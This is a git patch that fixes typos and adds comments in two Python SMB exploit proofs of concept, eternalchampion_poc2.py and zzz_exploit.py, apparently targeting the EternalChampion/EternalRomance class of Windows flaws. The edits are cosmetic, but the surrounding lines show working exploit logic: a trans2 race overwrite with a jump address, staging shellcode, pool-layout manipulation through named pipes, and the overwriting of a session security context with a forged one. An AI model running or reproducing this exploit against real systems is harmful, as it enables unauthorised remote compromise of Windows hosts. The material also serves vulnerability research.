From acaa27cc801f7b78648a776d8cb8ab57546bd37e Mon Sep 17 00:00:00 2001
From: worawit <worawita@gmail.com>
Date: Thu, 22 Jun 2017 22:16:20 +0700
Subject: [PATCH] typo and some comment

---
 eternalchampion_poc2.py | 4 ++--
 zzz_exploit.py          | 6 ++++--
 2 files changed, 6 insertions(+), 4 deletions(-)

diff --git a/eternalchampion_poc2.py b/eternalchampion_poc2.py
index 1d24f53..010f7b4 100644
--- a/eternalchampion_poc2.py
+++ b/eternalchampion_poc2.py
@@ -24,7 +24,7 @@ target = sys.argv[1]
 pipe_name = sys.argv[2]
 
 # this one must do something to restore execution
-# Note: when stagine shellcode is executed, CONNECTION+0x3d0 is at top of stack
+# Note: when staging shellcode is executed, CONNECTION+0x3d0 is at top of stack
 staging_sc = '\xcc'*128
 
 def login_put_staging_sc(conn, staging_sc, maxBufferSize):
@@ -111,7 +111,7 @@ def nsa_race(conn, jmp_addr):
 	mid = conn.next_mid()
 	# we will overwrite 8 bytes at displacement 312, so data must be at least 320 bytes
 	req1 = conn.create_trans2_packet(setup, param=param, data='A'*324, mid=mid)
-	# chnage infoLevel to SMB_INFO_IS_NAME_VALID
+	# change infoLevel to SMB_INFO_IS_NAME_VALID
 	req2 = conn.create_trans2_secondary_packet(mid, param=pack('<H', 6))
 	req3 = conn.create_trans2_secondary_packet(mid, data=pack('<Q', jmp_addr), dataDisplacement=312)
 
diff --git a/zzz_exploit.py b/zzz_exploit.py
index a0a9999..90554d0 100644
--- a/zzz_exploit.py
+++ b/zzz_exploit.py
@@ -26,7 +26,7 @@ USERNAME = ''
 PASSWORD = ''
 
 '''
-Reverse from: SrvAllocateSecurityContext() and SrvImpersonateSecurityContext()
+Reversed from: SrvAllocateSecurityContext() and SrvImpersonateSecurityContext()
 win7 x64
 struct SrvSecContext {
 	DWORD xx1; // second WORD is size
@@ -293,6 +293,7 @@ def exploit(target, pipe_name):
 	for i in range(10):
 		tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
 		conn.set_default_tid(tid)
+		# fid for first open is always 0x4000. We can open named pipe multiple times to get other fids.
 		fid = conn.nt_create_andx(tid, pipe_name)
 		if not FRAG_POOL_SIZE:
 			leak_frag_size(conn, tid, fid)
@@ -315,7 +316,7 @@ def exploit(target, pipe_name):
 	shift_indata_byte = 0x200
 	conn.do_write_andx_raw_pipe(fid, 'A'*shift_indata_byte)
 
-	# Note: Even the distance between bride transaction is exact what we want, the groom transaction might be in a wrong place.
+	# Note: Even the distance between bride transaction is exactly what we want, the groom transaction might be in a wrong place.
 	#       So the below operation is still dangerous. Write only 1 byte with '\x00' might be safe even alignment is wrong.
 	indata_value = info['next_page_addr'] + 0x100 + 0x10 + 0x1000 + shift_indata_byte  # maxParameterCount (0x1000)
 	indata_next_trans_displacement = info['trans2_addr'] - indata_value
@@ -375,6 +376,7 @@ def exploit(target, pipe_name):
 	secCtxData = read_data(conn, info, secCtxAddr, info['SECCTX_SIZE'])
 
 	print('overwriting session security context')
+	# see FAKE_SECCTX detail at top of the file
 	write_data(conn, info, secCtxAddr, info['FAKE_SECCTX'])
 
 	# ================================